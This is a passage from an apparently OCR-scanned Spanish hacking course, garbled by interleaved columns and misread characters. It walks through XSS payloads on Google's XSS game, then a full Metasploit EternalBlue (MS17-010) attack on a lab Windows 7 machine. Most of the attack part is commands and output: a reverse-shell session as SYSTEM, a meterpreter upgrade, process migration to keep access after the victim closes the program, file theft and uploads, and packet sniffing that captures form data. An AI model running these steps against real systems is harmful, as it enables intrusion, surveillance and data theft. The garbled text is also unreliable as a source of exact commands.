These Nasty buggers can allow y 

your apps and you mus 
pronto! 


ous types of 
our enemies 
t learn to dispatch them, 


At Google, we know very well how important these bugs 
serious about finding and fixin 
$7,508 for dangerous XSS bu 


are. In fact, Goople ; 

ha: Ble 15 so 

8 XSS issues that we are paying mercenaries up to 
We are —BE£naries up to 


gs discovered in our most sensitive products 


In this training program, you 


z will learn to fi Ja - 
this: knowledeatto confuse acy o find and exploit Xss bugs. You'll use 


infuriate your adversarie 
: : S by preventi 
from happening in your applications. ing such bugs 


There will be cake at the end of the test. 


Haz clic en el botón verde, y te llevara al primer 
nivel de seis, en este nivel. 









[1/6] Level 1: Hello, world of XSS 


Mission Description 


This level demonstrates a common cause of cross-site scripting where u 


ser input 
is directly included in the page without proper escaping. 


Interact with the vulnerable application window below and find a way to make ił 
execute JavaScript of your choosing. You can take actions inside the Vulnerable 
window or directly edit its URL bar. 

Mission Objective 
Inject a script to pop up a JavaScript alert() in the frame below. 

Once you show the alert you will be able to advance to the next level. 


Your Target 


amy lam vulnerable 






URL ihttps://xss-game.appspot,com/level1/frame 





FourOrFour 


Enter query here... Search 


En este nivel, deberás hacer la inyección XSS más 
básica, en este caso, inyectar un script que cree 
una alerta en la página, este es un tipo de 
inyección reflejada. 

Para hacer esto, escribe el script 


<script>alert(*hacker”)</script>. 
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TR pun 


Este script es muy sencillo, es un script en 









JavaScript como lo que utilizamos en cualquier 






página para crear una alerta, sin embargo, como 
esta página es vulnerable, tomará el script en la 


búsqueda y lo ejecutará en los clientes. 








Al tener éxito la página te felicitará y te dará paso al 
siguiente reto. 











xss-game.appspot com says 


Congratulztions, you executed sn alert: 












This level You i 


now acvance to the next levoj 


1s ( 


Interact with 
execute JavaScript o your choosing. You can take actions inside th 
window or directly edit its URL bar. 


Mission Objective 
Inject a seript to Pop up a JavaScript alert() in the frame below. 


Once you show the alert you will be able to advance to the next level. 


Your Target 


ag lamvulnerable 























URL ttp ://xss-game appspot.com/level1/frame?query=<scriptralert("hacker")</script> | 


FourOrFour 






Sorry, no results were found for . Try again. 
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Me a o Co | N 6 
Ahora, en el segundo nivel, te pedirá que hagas Para resolver este reto, lo primero que 


otra inyección XSS, pero ahora del tipo persistente, probablemente intentaste, es utilizar el mismo 


script que en el reto 
lo cual es un poco más avanzado. pt q 


En este ejercicio, estás en una página que te 


permite hacer posts, y estos se quedan grabados. 


pasado(<script>alert(“hacker”)</script>) a ver 
qué sucede, te darás cuenta de que esto no 


[ ] Lap istence is key funciona, dejando un espacio blanco en el chat. 
2/6] Level 2: Pers 


Mission Description 






ag lam vulnerable 





Web applications often keep user data in server-side and, increasingly, client- 


side databases and later display it to users. No matter where such user- URL Ty rT 
controlled data comes from, it should be handled carefully- 












evel2/frame 
ASI TÁ- 

i 5 i d in complex apps. i | 
This level shows how easily XSS bugs can be introduce p o E al. 


t \ ; you want here, especially madness, 
Mission Objective 


Inject a script to pop up an alert() in the context of the application. — 


No i sak in c xecute the , You 
icati es your sts so if you sneak in code to execu | 
te: the application saves your pos ! S s ee | mei 
alert this level will be solved every time you reload AC; | Sat Oct 13 2018 13:10:25 GMT-0500 (Central Daylight Tima) 
f É 
| 


Your Target Prueba del chat 





Jg lamvulnerable = 
E O O NA NA You 
URL [https://xss-game.appspot .com/leve12/frome A z —— p3 


n Sat Oct 13 2018 13:10:25 GMT-0500 [Central Daylight Time) 
| Hadchattr Chatter from across the Web. 


You 
| Sat Oct 13 2918 23:01:40 GMT-0500 (Central Daylight Time) 


e Welcome! 


This is your persena! stream. You can post anything 
you Want here, especially madress. 


Aquí la falla la podríamos encontrar en el código o 


probando distintas cosas, notamos que en las 


= oi 


dé deale imágenes podemos crear errores, entonces 
Target code (Tagg 


ciate Gas Eu simplemente le decimos que hacer al encontrar un 
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. . om J 3 
error, con el código <img src="hacker 
0. y! 
onerror='alert("hackeandoando”)'> 


‘SS e.appspot.com says key 
[ =) / xs5-gam 


ations, you executed an alert: 


ingly, client- 
such user- 


; advance ic the next fevel 
1 i You can now advance tc the 
Web applicatio Bs 
side databi 
cont} 


complex apps- 
This level shows how easily 


Mission Objective 


a , p < 2 11 £ on. 
= K PP 

In ct 3 Ccript to O up an alert () in the conte t of the ap (4 ata n 

Je y p f 


. pp = = Pp > 2 ad (ec e 
Note the a bic a tion saves your osts SO f you sneak in code to ex ute th -) 
a ley i thi > level WI I ] b solved ever y ta me you r e load 1 i > 

= , > f 


Your Target 


aq tam vulnerable 








ES 


You 


Szt Oct £3 2918 13:23:30 GMT-0500 (Central Daylight Time) 


You | — 
Sst Oct 13 20185 13:24:24 GMT-G500 (Central Daylight Tima) 





Hay otros cuatro niveles, sin embargo, creo que es 
mas apropiado que sigas en esto por tu cuenta, 
recuerda, la meta aqui es generar errores 
utilizando cédigo JavaScript y HTML, utiliza la 
documentación de OWASP para ayudarte. 
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Exploits de Metasploit 


Hasta ahora hemos explorado algunos de los 
exploits mas comunes en aplicaciones y paginas 
web, sin embargo, debemos de recordar que 
existen muchas otras plataformas en las que 
existen vulnerabilidades que permiten explotación, 
y Una de mis herramientas favoritas para esto sigue 
siendo Metasploit. 

A este punto ya conoces la estructura de 
Metasploit, así que notaras que el módulo que nos 
interesa realmente es el de “exploit”, abre la 


herramienta y empecemos a explorar este módulo 
más. 


Hackeando Windows moderno - 
(EternalBlue, EternalPulsar, 


EternalRomance) 
En estos últimos años fue liberado un exploit que 


ha probado ser devastador para el sistema 


operativo Windows, desde los Windows 7, hasta 
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los Windows Servers, ya que ha afectado a casi 
todas las versiones del sistema moderno, esta 
vulnerabilidad se le llamó EternalBlue, aunque 
existen ya varias versiones de esta, así que vale la 
pena más investigarlo con el CVE con el que fue 
reportado, el cual es del CVE-2017-0143-CVE- 
2017-0148 (si, tiene más de un CVE). 

Esta vulnerabilidad nació a partir de una falla en el 
sistema SMB de Windows, y fue utilizada para 
crear el ransomware WannaCry, que causó 
pérdidas millonarias en muchas organizaciones, ya 
que, con tener acceso por red al sistema, se puede 
obtener acceso con privilegios elevados por este 


método. 


Práctica 


Ahora sí, vamos a realizar el ataque, para esto, 
abre primero tu sistema Windows 7 en la máquina 
virtual, y tu sistema Kali. 

Asegúrate que ambos tengan visibilidad uno del 


otro (que estén en la misma red), para esto quizás 
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tendrás que deshabilitar el Firewall de Windows 


(esto es común dentro de una red empresarial). 














Ahora vamos a confirmar que nuestro Windows 
tiene la vulnerabilidad, podríamos hacerlo de 
distintas formas, incluyendo Nessus, sin embargo, 
una de mis maneras preferidas para algo sencillo 
como esto es utilizar nmap, ya que es sencillo, 
rápido, y decentemente discreto (comparado con 
algo como Nessus). 
Para esto, escribiremos en la terminal: 
nmap -p445 --script smb-vuln-ms17-010 
192.168.1.141 
Tomando en cuenta que 192.168.1.141 es la IP del 
Windows que atacaremos, también recordemos 


que esto pudimos encontrarlo si se van a la página 
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Ahora si, ejecutamos el script en nuestra terminal, 
de scripts de nmap 


deberiamos obtener una respuesta similar a la 


https://nmap.org/nsedoc/index.html y buscan 
EternalBlue o su CVE, encontrarian esta pagina 


Siguiente, nota el apartado en el que te dice que el 


httos://nmap.org/nsedoc/scri ts/smb-vuln- estado de este sistema es VULNERABLE. 


ms17-010.html con instrucciones de como usar el | ¡+ nmap =p445 --script smb-vuln-ms17-010 192, 168. 1.141 
ms1/-010.Ntm 


starting Nmap 7.70 ( https://nmap.org ) at 2018-10-13 13:52 CDT 


. Wap scan report for 192,168,1, 141 
script para determinar si es o no un sistema a is up (0.000265 latency). 





t ORT STATE SERVICE 
ble a es O. A15/tcp open microsoft-ds 
vulnera wc Address; 00:0C;29:BE:04:77 (VMware) 
File smb-vuln-ms17-010 | ost SCOE rasite 
host smb-Vuln-ms17-010: 
rl bh ae VULNERABLE: 
e tne dicen nmap orgnmapiscrptsismib-vuinanst7-O10.nse |} Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
m State: VULNERABLE 
SMBv1 server Is vulnerable to a remote code execution vulnerabifity (ms17-010, a.k.a. EtemaiBlue). The vulneradeily IS 1 by | Risk factor: HIGH 
AA glee. a A critical remote code execution vulnerability exists in Microsoft SMBv1 
WannaCry and Petya ransom. o D 0 and checks ifthe error "STATUS INSUFF_SERVER_RESOURCES” is returned to determine ifthe large i | servers (ms17-010). 
; ) ites a transaction on FID 0 and che a = 
The sctipt connects to the SIPC free, execu 


5 ched systems. 
patched against ms17-010. Additionally # checks for known error codes returned by patched sys 


i |. Disclosure date: 2017-03-14 
a ys E. References: 

, indaws XP. 2003, 7. 8, 8.1, 10, 2008, 2012 and 2016. | | | 
Tested on Windows XP, 2003, 7 https://technet.microsoft, com/en-us/library/security/ms17-010, aspx 
References: 

. httpsiitechnet microsoft. comien-usilibraryisecurityims17-010.aspx 


nttps://blogs. technet microsoft. com/msrc/2017/05/12/customer-guidance-for-wannaci ot attacks) 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 
i t-attacks! a 
i 12017/05/12!customer-guidance-for-wannacryp 
‘ httpsz/blogs.technetmicrosoft.comimsrc! 


, i -usiibrary/ee44 1489.aspx la Ls Pb A Dil 
ae anb aoraapiinetepllramewordloblmasterimoduls/auxliryiscanne/smblsmb. = 
; hos: comvicidminmap-nse-scripisikiNotes-aboutsmb.ruln:ns! 








| Ahora que ya sabemos que nuestro ataque será un 
See also: éxito, abriremos Metasploit con el comando 
» smb-double-pulsar-backdoor.nse 
Script Arguments msfconsole. 


smb-vuln-ms17-010.sharename 





Dentro de Metasploit, podriamos poner la ruta 
Share name to connect. Default: IPCS 


smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 


donde está el exploit, la cual es 
exploit/windows/smb/ms17_010_eternalblue, sin 


embargo, si asumimos que no conocemos la ruta 
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mst > search eternalblue | balines 
[!] Module database cache not built yet, using slow Search| PAra BETI GU dl 





Matching Modules 


uxiliary/admin/smb/ms17 010 command 17-03-1 normal 517-910 EternalRomance/EternalSynerqy/Eternaichanp: | lt Target: 
OUT LIY AGMINA smofsmsl) ane OL! i jtt 
Remote Windows Command Execution > a A 
T ( oli L/winde nsabi 17 010 eternalbtue 2917 -03-1 average MS17-919 EternalBlue SMB Remote Windows Kernel Por 
A DIL/W1! WSs Sil (SIY A: i Lue ¿01 A J 
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desde antes, podemos utilizar la palabra reservada | Para utilizar el script usaremos la palabra 
search para encontrar dicho exploit. 





reservada use, ejecutando el comando use 


exploit/windows/smb/ms17_01 0_eternalblue 















sf > use exploit/windows/smb/ms17 010 eternalblue 
. f eS 
Esperamos unos cuantos minutos, y en la terminal sf exploit ( if 


Luego de eso, veremos las opciones que tenemos 
la herramienta nos dara las rutas de los exploits 


que modificar con las palabras reservadas show 
options. 


relacionados con Eternalblue, nota que también 










nos muestra la version compatible con Windows 8, = 
see z . ig 
y el script en el modulo auxiliary haria la misma | 


iy 


Sule options (exploit/windows/smb/ms17 010 eternalblue); 
| 


) > show options 





función que hicimos con nmap para probar si es 


{|| i 


ji llame Current Setting Required Description 





\ 
Qui no. AÑ GroomAl Locations Initial number of times to groom the kernel pool, 
vulnerable la agin © GroomDelta The amount to increase the groom count by per try, 
r . : Í laxExploitAttempts The number of times to retry the exploit, 
En este caso nuestra maquina es Windows l, asl mee) ProcessName spoolsv,exe Process to inject payload into, | 
ts E A | RHOST 5 The target address 
que utilizaremos esta versión. PORT 445 


The target port (TCP) 


"BDomain (Optional) The Windows domain to use for authentication 
| 


SHBPass (Optional) The password for the specified username 
NBUser (Optional) The username to authenticate as 
eri fyArch Check if remote architecture matches exploit Target. 
erifyTarget : Check if remote 0S matches exploit Target. 
Disclosure Date Rank Description 





E i Name 
s cu Jam sf she > i mol l i soa 
1 18 2917.03. average y -OE rnal8Blue SMB Remote Windows Kernel Poi | 
exploit/windows/smb/msl? 010 eternalblue wing 2917-03-1 average M517-910 Etern : 


7 ¢ F 4517-010 EternalRomance/EternalSynerqy/EternalChacy 
exploit/windows/smb/ms17 010 psexe normal M517-010 Eter : 


Windows 7 and Server 2008 R2 (x64) All Service Packs 
Remote Windows Code Execution 





| 
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nsf exploit ) > set RHOST 192.168. 1,1410 
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Como podemos notar, casi todas las variables ya | Cuando aparezca esto, significa que el ataque fue 
tienen valores, sin embargo, la mas importante, | exitoso, presiona enter y en poco tiempo tendras 











RHOST, aun no tiene variable, esta se refiere a la una shell del sistema con privilegios elevados. 


IP del objetivo, la cual es 192.168.1.141, en este 


192.168. 1, 141:445 - ETERNALBLUE overwrite completed successfully (0xCO00000D)! 
192,168.1,141:445 - Sending egg to corrupted connection. 


caso, el Windows 7. ESU. UN at :445 - Triggering free of corrupted buffer. 
Command shett session 1 opened (192,168,1.67:4444 -> 2 
Vamos a asignarla con la palabra reservada set, O E E eee mc e Lei ISA O 


E 168. 1,141:945 - =-=-=-=-=-s-=-=-=-=-=-=-=- =o S-S->-S->- 5-5-5 -S-=-=-S-=-=-= 
192,168,1.141:445 - =-=-=-s-=-<-2-=-=-5-5-5-5-=-=-= A, E O 


siendo el comando completo set RHOST 


192.168.1.141. 
Tener esto en la terminal significa que tienes una 


shell del sistema con privilegios elevados, en otras 


RHOST => 192,168,1,141 


palabras, es como si tuvieras una consola de 


comandos abierta en el sistema. 


Y listo, ya estamos preparados para lanzar el 


ataque, para lanzarlo, utilizaremos la palabra | C.: \Windows\ system32> 


reservada exploit, y el ataque iniciara. 





) > exploit Esto significa que tienes control completo del 


f+} Started reverse TCP handler on 192,168.1.67:4444 i — 
e : sistema, felicidades, el ataque fue un éxito. 


| 192,16 
+] 192, 
[+] 192, 
[*] 192. 
[*] 192. 
[*] 192. 
+] 192. 
[*] 192, 
[*] 192,168. 


,141:445 - Connecting to target for exploitation. 


.141:445 - Connection established for exploitation. 
141:445 - Target 0S selected valid for 0S indicated by SMB reply 


l 
i 
dl p 
1.141:445 - CORE raw buffer dump (25 bytes) ost expl ic 

1.141:445 - 6x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42-- Windows 7 ho p otación de una shell 

.1,141:445 - 0x00000010 61 73 69 63 20 37 36 30 30 asic 7600 A 

1,141:445 - Target arch selected valid for arch indicated by DCE/RPC reply pesar de que el ataque fue un éxi 

1,141:445 - Trying exploit with 12 Groom Allocations. q q éxito, notaras que 
1.141:445 - Sending all but last fragment of exploit packet | simplemente con una shell realmente no tienes 





tanto control como teníamos con un meterpreter, 
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ya que no puedes fácilmente descargar material, para esto, haz clic en la tecla control y luego la 
subir o acceder a funciones como el teclado, letra z, y presiona y y enter para aceptar 


cámara, pantalla, etc, al igual generalmente estas 


limitado a ver archivos del sistema, administrarlos o C: Win dows \ S y 5 tem3 a E 





Background session 1? [Y/N] 


ejecutarlo, a menos que ejecutes un script más 












avanzado en la terminal. Ahora estás en la consola principal de Metasploit 


C:\Windows\system32>dir | es tiempo de utilizar el módulo POST de esta 
dir i 
El volumen de la unidad C no tiene etiqueta. herramienta, en este caso nos interesa transformar 
El n@mero de serie del volumen es: 4A19-FD/D la shell : 
a un meterpreter, así que utilizaremos la 


Directorio de C;\Windows\system32 palabra reservada search para buscar un script asi 
asi, 


<DIR> escribiendo search shell_ to _meterpreter. 


<DIR> W 
loit 
<DIR> OCOA | ) > search shell to meterpreter 


158.208 aaclient.dll lodule database cache not built yet, using slow search 
3.745.792 accessibilitycpl.dU BEN 
39,424 ACCTRES.dUl ES bocoi 
9.216 acledit.dll o tiempo te mostrará los resultad i 
OS 
13/07/2009 20: 154,112 aclui.dll , Siendo 









el script post/multi/manage/shell_to_meterpreter 
el que buscamos. 
Esto no es un mal nivel de acceso, pero como ng Modules 





siempre, queremos más, así que, para eso, vamos 


Disclosure Date Rank Description 


a transformar nuestra shell en una sesión with Tar em ee de 


normal Shell to Meterpreter Upgrade 


meterpreter. 





Empecemos por mandar al background la shell, 
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post/multi/manage/shell_to_meterpreter. 


msf exploit( 
mst post 


Y lo configuraremos como cualquier otro script en 
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Lo utilizaremos con el comando use Una vez configurado, iniciamos el script con la 


palabra exploit. 





) > use post/multi/nanage/shell.to meterpre Y Luego de esto, empezará a procesar el script. 


>l f post( ) > exploit 





Metasploit, escribiendo show options para ver las Upgrading session ID: 1 


opciones, y posteriormente seleccionaremos que starting exploit/multi/handler 


queremos ejecutarlo en la sesión 1, qué es la shell 
que obtuvimos con EternalBlue. 

Recuerda que podemos saber el número de la 
sesión utilizando la palabra reservada sessions -i, 
y que podríamos modificar las variables LHOST y 


LPORT si quisiéramos mandar el meterpreter a sending Stage (179779 bytes) to 192,168,1,141 


started reverse TCP handler *on 192.168.1.67:4433 
Post module execution completed 










Y alos pocos segundos deberia de aparecer en tu 
terminal esto, que significa que tienes un 
meterpreter de la maquina. 





reterpreter session 2 opened (192,168,1,67:4433 -> 192, 168.1, 141;49413) at 2018-10-13 15:39:49 -0500 


otro puerto o sistema. stopping exploit/multi/handler 


mst post 


Module options | 


Name Current Setting Required Description 


LHOST 
LPORT 4433 
SESSION 


msf posti 
SESSION => 1 







) > show options 





Una vez con el nuevo acceso, puedes confirmar la 





post/multi/manage/shell to meterpreter): ae 
sesión con el comando sessions -i, e interactuar 


E ETS | ol | con el meterpreter con el comando sessions -i 2 
yes Start an exploit/multi/handter to receive the connection | : 


IP of host that will receive the connection from the payload (Will try to auto detec! 
Port for payload to connect to, 
The session to run this module on, 


) > set SESSION 1 
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ssions -1 
ist post(’ ) > se 


Active sessions 


Information 


Id Name Type | 
Connection 


il shell x64/windows 


Micr t Corporation... 
Ss An tees x86/windows NT AUTHORITY\SYSTEM @ WIN-KAGNAUTILSB 


192,168.1.67:4433 -> 192,168,1.141:49413 (192.168.1.141) 


ssions -1 2 
msf post ( ) > se 


[*] Starting interaction with 2... 


meterpreter > f 





Y listo, a este punto ya tienes control completo del 
sistema, aprenderemos más de post-explotación en 


la siguiente sección. 


msf post( | | 
[+] Starting interaction Wart ZE 





) > sessions 





meterpreter > getuld 
Server username: NT AUTHORITY\SYSTEM 


meterpreter > ge URE: 
ee | TE 7 (Build 7600). 
x64 

es ES 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter x86/windows 


meterpreter > fj 





System Language : 





478 








at 


WHITE SU 


| 
Microsoft Windows [Versi n 6.1.7600] Copyright (c) 9) 
192.168.1.67:4444 -> 192,168.1.141:49380 (192. 168,1. 141) 





) 








WHITE SUIT 
Post- Explotación 


Ahora que ya aprendiste sobre cómo hacer 
reconocimiento, análisis de vulnerabilidades, y 
explotar diversos sistemas, tienes que aprender a 
dominar lo que sigue, que se llama post- 
explotación, post explotación es todo lo que le 
sigue, puede ser desde cosas sencillas como robar 
un archivo, activar la webcam o el micrófono, hasta 
cosas más avanzadas como pivotear, es decir, 
atacar a un sistema desde un sistema infectado. 
En esta sección aprenderás cómo realizar cada 
una de estas cosas, algunas de estos ataques ya 
los he mencionado anteriormente, pero las 
funciones más avanzadas como persistencia y 
pivoteo las veremos en esta sección. 

Otra cosa, principalmente utilizaremos Metasploit 
y asumiremos que tienes una sesión meterpreter, 
ya que a este punto ya sabes que, si obtienes una 
sesión powershell o shell, puedes convertirla en 


meterpreter relativamente fácil. 
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Post-Reconocimiento local 


Antes que nada, siempre que obtenemos acceso a 
un sistema, lo primero que deberíamos hacer es 
realizar una etapa de reconocimiento local, es 
decir, dentro del sistema comprometido. 

Nos interesa saber información como en qué 
sistema estamos, usuario, que nivel de permisos, 
que IP tenemos, etc., así que hagamos eso 


primero. 


¿Qué sistema es? 


Para obtener que sistema es, lo más sencillo es 
utilizar el comando sysinfo, que nos mostrara algo 
de la información del sistema como sistema 
operativo y versión de este, así como el nombre de 


la computadora en donde estamos. 
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jeterpreter > sysinfo 
computer ; WIN-KAGNAUTILSB 


05 : Windows 7 (Build 7600) 
irchitecture : X64 

ASES 

main : WORKGROUP 

logged On Users : 2 


leterpreter x86/windows 
| ¿Qué usuario es? 


Para obtener el usuario en el que tenemos control, 
basta con utilizar el comando getuid, que nos 
mostrará el nivel de usuario en el que está 
corriendo el proceso que te da control del sistema. 
Esto también es muy útil porque podemos saber si 
tenemos control nivel sistema o nivel usuario, por 
ejemplo, si estamos corriendo como 
“AUTHORITY/SYSTEM”’, podemos asumir que 


tenemos privilegios de sistema. 


eterpreter > getuid 


erver username: NT AUTHORITY\SYSTEM 
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k: 1 
i) 


Y mostrará los procesos que está corriendo el 


Mientras que un acceso nivel usuario se vería algo 
sistema, mostrándonos el PID, que es Process ID 









como lo siguiente. 
el nombre del proceso, y el usuario que está 


meterpreter > getuid ME tizendo ese process 
Server username: WIN-KAGNAUTILSB\Whitesuit Jackin A | 





Arch Session LS 






Ambos niveles de usuario tienen su funcion, por 


C:\Program Files ua MServer, 
eV 


ejemplo, un servicio nivel sistema puede afectar las 


interfaces y realizar ciertos ataques, como los de 


pivote; sin embargo, un acceso nivel usuario podría co AL Tl ; evicio dere CW ios Sse st 
acceder y atacar recursos a nivel usuario tal como Eo ee a oe 
los navegadores, cámaras, micrófonos, teclados de i a : MAMA cig Closet ie o | 
manera mas facil | aE eal fo aa MIM SIE 
Ahora, si obtuvimos acceso a este sistema por 
Procesos | medio de un payload, si la victima cierra nuestro 
Nuestro malware esta corriendo en un proceso en proceso perderiamos acceso al sistema, sin 
embargo, una forma facil de evitar esto es 


el sistema infectado, asi como todos los demas | 
migrarlos a otro proceso, para hacerlo es necesario | 


programas, así que algo que nos interesa conocer 
que nuestro código malicioso se “cuelgue” de otro 





son los procesos o programas que está corriendo 
programa, para esto, utilizaremos el comando 


migrate, seguido del PID al que nos queremos 


meterpreter > ps migrar 


el sistema, para esto, usa el comando ps. 
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Recuerda, tenemos que migrarnos a un proceso Dirección IP 
con el mi usuario en e a i i 
el mismo usuario en el que estamos, en este Y, por último, todo sistema que explotemos tiene 
caso me moví al proce : T , 
e moví al proceso 2996, entonces, aunque una dirección en la red en la que está, es decir, una 


cierren mi programa malicioso, no perderé control. IP en su LAN, nos interesa saber cuál es esta 


meterpreter > migrate 2996 
[*] Migrating from 3036 to 2996... 
[*] Migration completed successfully. 


dirección, además de cómo está conectado, es 


decir, que interfaz de conexión está usando, para 








esto podemos usar simplemente el comando 
















Puedo confirmar que sigo teniendo acceso ifconfig. 
ejecutando algunos comandos basicos. 

° meterpreter > ifconfig 
meterpreter > getuld Un sistema puede tener muchas interfaces, pero la 
Server username: WIN-KA6NAUTILSB\WhiteSuit Hacking) que nos interesa conocer es la que tenga una IP en 

meterpreter > sysinfo | 
Computer - WIN-KAGNAUTILSB | la red LAN, y en donde dice IPv4 o IPv6 
OS Windows 7 (Build 7600). l encontraremos la IP local. 


Architecture : x64 
System Language : es ES w ba | 
Domain - WORKGROUP ame : Conexi@n de red Intel(R) PRO/1000 MT 


Logged On Users. 2 | ard MAC : ed 


| 


Meterpreter ; x64/windows lllipva Address : 192.168.1.141 
H\IPv4 Netmask : 255.255.255.0 
IPv6 Address : fe80::fcfc:1498:6662:5b26 
|lPv6 Netmask : fff: fff: TTT FAA: 
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Eso es todo para el reconocimiento en post- 
explotación, ciertamente hay muchos más 
comandos y funciones que podamos utilizar. Te 
recomiendo pensar que más información te 
interesaría sacar de un sistema comprometido y 
encontrar la manera de hacerlo en Metasploit 


utilizando lo que has aprendido hasta ahora. 


Ataques al objetivo 


Ahora que conocemos un poco más del sistema al 
que tenemos acceso, empecemos a atacar, vamos 
a comprometer principalmente la integridad y la 


confidencialidad de la información de nuestro 


objetivo. 


Descarga de archivos 


Una vez que estamos en el meterpreter, lo primero 


que nos interesa es saber en qué ubicación en el 


directorio de archivos estamos, para esto, podemos 


usar el comando pwd. 
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meterpreter > pwd 
C:\Windows\system32 


Ahora, nos interesa saber los archivos que estan 





dentro de esta dirección, con el comando Is 


podemos obtener esta informacion. 


prerpreter > Us 
ing: C:\Windows\system32 


Size Type Last modified Name 


10777 / WTI 0 0500 0OCOA 
100666 / rw= rvl-rw- 19008 fil 2018-10-14 21:58:55 -0500 7B296FB0-376B-497e-B012-9C450E1B/327-5P- 
) (7483456-A289-439d-8115-601632D005A0 
1066/rw-rw-rw- 19008 fil 2018-10-14 21:58:55 -0500 7B296FB0-376B-497e-B012-9C450E1B7327-5P- 
l (7483456-A289-439d-8115 -601632D005A0 
10n666/tw-rw-rw- 39424 fil 2009-07-13 20:24:45 -0500 ACCTRES.dll 
ii777/rwxrwxrwx 24064 fil 2009-07-13 20:38:55 -0500 ARP.EXE 
TANIA 499712 fil 2009-07-13 20:41:53 -0500 AUDIOKSE, dll 





Digamos que queremos ver lo que está en el 
escritorio, vamos a cambiarnos de directorio con el 


comando cd. 


meterpreter EC 
meterpreter pwd 

(CEN 

meterpreter cd Users 
METSrp reten pwd 


ESAS 
meterpreter cd "WhiteSuit Hacking" 
meterpreter > cd Desktop 


meterpreter > pwd 
C:\Users\WhiteSuit Hacking\Desktop 
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Ahora, digamos que queremos descargar un mete FP Pere Load Ea r 
archivo, el comando WinRAR nos permitirá esto. Loading extension sni fer... Success. 


AE i aa aa rar.exe | | Ahora nos interesa saber que interfaces de red 

e aie (MEE iB of 2.03 MiB o a cd | podemos utilizar para interceptar las conexiones 
| í ar oats T a r r k as winrar.exe -> eer «exe | del sistema, para esto, utilizaremos el comando 

[*] download : winrar.exe -> winrar.exe 





A 


i 
T 





sniffer_interfaces. 


Nota que solo una de ellas tiene DHCP, es decir, IP 


en la red, esa es la que nos interesa utilizar. 
ierpreter > sniffer interfaces 





Si queremos eliminarlo con rm podemos hacerlo. 









meterpreter > rm winrar.exe 


ME , ir archivos si lo deseamos, WAN Miniport (Network Monitor)" ( type:3 mtu:1514 usable:true 
También podríamos subir a Conexión de red Intel(R) PRO/1000 MT' ( type:0 mtu:1514 usable: true dhcp: true wifi:f 






dhcp: false wifi: false ) 
alse } 







con el comando upload. 





“oot/WhiteSuitBG, png | Ri Sp 
repre or S EA AA Ahora iniciaremos la intercepción de paquetes, 
š ] | - 3, NO! 
+] 2,27 MiB (100.0%): /root/WhiteSuitBG. png | : 
t | es a ecw cae -> WhiteSuitBG. ong | recuerda, el sniffer guardará todos los paquetes 







que pasen por esa interfaz, para hacer esto, 


Sniffer 


Ahora imaginemos que lo que queremos realmente 





utilizaremos el comando con el formato 


sniffer_start <número de interfaz> <número de 
es interceptar las conexiones que hace esta paquetes a guardar> 








i reter > sniffer start =h 
bi der interceptar eS | 7 
máquina en su red, para po ; antaro ages snlffer start [interface-id] [packet-buter 11-200000)) [bpf filter (posix neterpreter only)] 
to, podemos t 
paquetes en esta, para es 


sniffer en el sistema, con el comando load sniffer. 
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Barre Su decir 


En este caso, digamos que queremos interceptar En este caso, si quiero guardar el archivo en mi 


2000 paquetes en la interfaz dos, el comando que escritorio, el comando será sniffer_dump 2 





Iroot/Desktop/sniffer.pcap 


Af eterpreter > sniffer dump 2 /root/Desktop/sniffer.pcap 
| Flushing packet capture buffer for interface 2... 

| Flushed 2000 packets (969459 bytes) 

| Downloaded 054% (524288/969459)... 

Para ver el estatus de cuantos paquetes hemos Downloaded 100% (969459/969459)... 

interceptado, puedes utilizar el comando ‘| Download completed, converting to PCAP... 


sniffer_stats <número de interfaz>, en este caso 1] PCAP file written to /root/Desktop/sniffer.pcap 
| Ahora detengamos el sniffer con el comando 
meterpreter > sniffer stats 2 4 sniffer_stop <número de interfaz>, es decir, 
MeELErDreter = |) 

[*] Capture statistics for inte Piece 2| sniffer_stop 2. 


packets: 1028 eterpreter > sniffer stop 2 
l Capture stopped on interface 2 
bytes: 201916 ji] There are 5458 packets (3871863 bytes) remaining 


| Download or release them using ‘sniffer dump' or ‘sniffer release’ 








utilizaremos sera sniffer_start 2 2000 


meterpreter > sniffer start 2 2000 
[*] Capture started on interface 2 (2000 packet buffe;| 













sería sniffer_stats 2. 


















Ahora, para descargar estos paquetes, el comando 


es sniffer_dump <número de interfaz> Listo, a este punto tenemos todas las conexiones 


que hizo la máquina desde que iniciamos el sniffer 





<Idirección/archivo.pcap>. 





| (limitado a 2000 paquetes). Para abrirlo, 


meterpreter > sniffer_dump -h 


Usage: sniffer dump [interface-id] [pcap-file) simplemente abrimos el archivo pcap en 


WireShark. 
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Frame 86: 917 bytes on wire (7336 bits), 917 bytes captured (7336 bits) on interface 
Ethernet II, Src: 0a:6c:06:fa:1b:f2 (@a:6c:06:fa:ib:f2), Dst: Ga:6f:94:56:c9:1b (@a:! 


aniffer.prap 
File Edt View Go Capture Analyze Statistics Telephony Wireless Tools Help 
AESOOTMRE Gee son. ==82290 2 








































¡MEA _ ae O rs = = n 33 Internet Protocol Version 4, Src: Ost: i 
[RjAspty a alsptay titer Ci SA [=> —=——_———————— i i 
A ts SO = = : Transmission Control Protocol, Src Port: 43486, Dst Port: 80, Seq: 1, Ack: 1, Len: 8' 
No. Time Source Destination Protocol Length info 3 _— -= i - J REF + Ò. 
CET ACE SEENEL T R E AT A EE | Hypertext Transfer Protocol | 
2 0.800006 122.168, 1.44) 492,168.1.101 TCP S4 49347 ~ 8065 [ACK] Seq=1 Ack=1 Wio-16248 Len=@ v , ai 
39.899009 192,168.1.23 192.168,1.255 UD? 305 54915 - 54915 Len=263 HTML Form UR COEL ADO 5 wj=form-urlencoded 
4 0. 889068 197.158,1.141 192,168,1.187 ice 54 49348 - 6609 [ACK] Seq=i Ack=1 Win-16206 Len=0 v , da va wan 
5 0.090969 492.168.4.83 177.247.11,174 UD? 1292 61973 — 443 Len=1359 Form item: "user_id" = “AG: ssf" 
6 0.682039 192. 163.1,82 172.217.211.174 wpe 1392 61973 - 443 Len=1359 Key: us 
7 0.900009 492.468.1.83 172.247.114.114 YO? 1392 61973 - 443 Len=1359 y: = 
8 0.999099 132. 168.1.83 372.217.11.174 LD? 1392 61973 ~ 443 Len=1359 Va ; : ex 
9 4.599609 199.169.1,83 172.217.11.174 UDP 1392 61973 - 443 Len=1359 lue: A9117579055f 
